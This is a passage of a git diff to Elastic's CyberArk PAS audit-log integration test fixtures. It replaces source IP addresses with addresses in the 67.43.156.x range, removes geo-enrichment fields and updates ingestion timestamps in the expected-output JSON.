\u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } @@ -1041,17 +906,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1068,7 +924,7 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { @@ -1076,8 +932,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:25Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Set Password", "message": "Set Password", "issuer": "PSMP_ADB_asr-cyberark-psm-ssh", @@ -1091,8 +947,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212182200Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320208600Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log index f3062f7ea56..a0bb4b16a06 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log @@ -1,4 +1,4 @@ <5>1 2021-03-08T18:24:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:50","IsoTimestamp":"2021-03-08T18:24:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"PVWAAppUser","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAPrivateUserPrefs","File":"Root\\YWRtaW5pc3RyYXRvcg==","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} -<5>1 2021-03-10T18:44:08Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:44:08","IsoTimestamp":"2021-03-10T18:44:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} -<5>1 2021-03-10T22:17:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:40","IsoTimestamp":"2021-03-10T22:17:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} +<5>1 2021-03-10T18:44:08Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:44:08","IsoTimestamp":"2021-03-10T18:44:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} +<5>1 2021-03-10T22:17:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:40","IsoTimestamp":"2021-03-10T22:17:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} <5>1 2021-03-11T19:45:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 11:45:26\n 2021-03-11T19:45:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 98\n Open File (Write Only)\n Info\n Administrator\n Open File (Write Only)\n \n \n PVWAConfig\n Root\\PVConfiguration.xml\n 127.0.0.1\n \n \n \n \n \n Open File (Write Only)\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 11:45:26","IsoTimestamp":"2021-03-11T19:45:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log-expected.json index c3b133e2ebe..56d1d0b1fb3 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "open file (write only)", - "ingested": "2021-06-09T10:24:37.546522700Z", + "ingested": "2021-12-09T13:37:14.711383300Z", "original": "\u003c5\u003e1 2021-03-08T18:24:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:24:50\",\"IsoTimestamp\":\"2021-03-08T18:24:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAPrivateUserPrefs\",\"File\":\"Root\\\\YWRtaW5pc3RyYXRvcg==\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"\"}}}", "code": "98", "kind": "event" @@ -65,20 +65,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -98,7 +86,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -108,7 +96,7 @@ "iso_timestamp": "2021-03-10T18:44:08Z", "file": "ROOT\\PVConfiguration.xml", "safe": "PVWAConfig", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Open File (Write Only)", "message": "Open File (Write Only)", "issuer": "Administrator", @@ -122,8 +110,8 @@ "event": { "severity": 2, "action": "open file (write only)", - "ingested": "2021-06-09T10:24:37.546544100Z", - "original": "\u003c5\u003e1 2021-03-10T18:44:08Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:44:08\",\"IsoTimestamp\":\"2021-03-10T18:44:08Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:14.711392300Z", + "original": "\u003c5\u003e1 2021-03-10T18:44:08Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:44:08\",\"IsoTimestamp\":\"2021-03-10T18:44:08Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"\"}}}", "code": "98", "kind": "event" } @@ -135,19 +123,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -167,7 +144,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -177,7 +154,7 @@ "iso_timestamp": "2021-03-10T22:17:40Z", "file": "ROOT\\PVConfiguration.xml", "safe": "PVWAConfig", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Open File (Write Only)", "message": "Open File (Write Only)", "issuer": "Administrator", @@ -191,8 +168,8 @@ "event": { "severity": 2, "action": "open file (write only)", - "ingested": "2021-06-09T10:24:37.546545600Z", - "original": "\u003c5\u003e1 2021-03-10T22:17:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:40\",\"IsoTimestamp\":\"2021-03-10T22:17:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:14.711398Z", + "original": "\u003c5\u003e1 2021-03-10T22:17:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:40\",\"IsoTimestamp\":\"2021-03-10T22:17:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"\"}}}", "code": "98", "kind": "event" } @@ -259,7 +236,7 @@ "event": { "severity": 2, "action": "open file (write only)", - "ingested": "2021-06-09T10:24:37.546546700Z", + "ingested": "2021-12-09T13:37:14.711403400Z", "original": "\u003c5\u003e1 2021-03-11T19:45:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 11:45:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T19:45:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e98\u003c/MessageID\u003e\\n \u003cDesc\u003eOpen File (Write Only)\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eOpen File (Write Only)\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePVWAConfig\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PVConfiguration.xml\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eOpen File (Write Only)\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 11:45:26\",\"IsoTimestamp\":\"2021-03-11T19:45:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\PVConfiguration.xml\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "98", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-99-open-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-99-open-file.log-expected.json index 9b502fb1c06..cd746dd1cb6 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-99-open-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-99-open-file.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "open file", - "ingested": "2021-06-09T10:24:37.636379200Z", + "ingested": "2021-12-09T13:37:15.063025200Z", "original": "\u003c5\u003e1 2021-03-04T19:10:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:05\",\"IsoTimestamp\":\"2021-03-04T19:10:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"99\",\"Desc\":\"Open File\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Open File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\EPMConfiguration.xml\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File\",\"GatewayStation\":\"\"}}}", "code": "99", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-legacysyslog.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-legacysyslog.log-expected.json index 9dee3458ac5..18b20cc2947 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-legacysyslog.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-legacysyslog.log-expected.json @@ -45,7 +45,7 @@ "event": { "severity": 2, "action": "retrieve file", - "ingested": "2021-06-09T10:24:37.659605700Z", + "ingested": "2021-12-09T13:37:15.166336200Z", "original": "Mar 08 03:41:01 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"51\",\"Desc\":\"Retrieve File\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManagerShared\",\"File\":\"Root\\\\Policies\\\\Policy-BusinessWebsite.ini\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve File\",\"GatewayStation\":\"\"}}}", "code": "51", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-rfc5424syslog.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-rfc5424syslog.log-expected.json index bd0aeb6e680..b23043495f1 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-rfc5424syslog.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-rfc5424syslog.log-expected.json @@ -49,7 +49,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:37.684018100Z", + "ingested": "2021-12-09T13:37:15.267387900Z", "original": "\u003c5\u003e1 2021-03-04T17:27:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 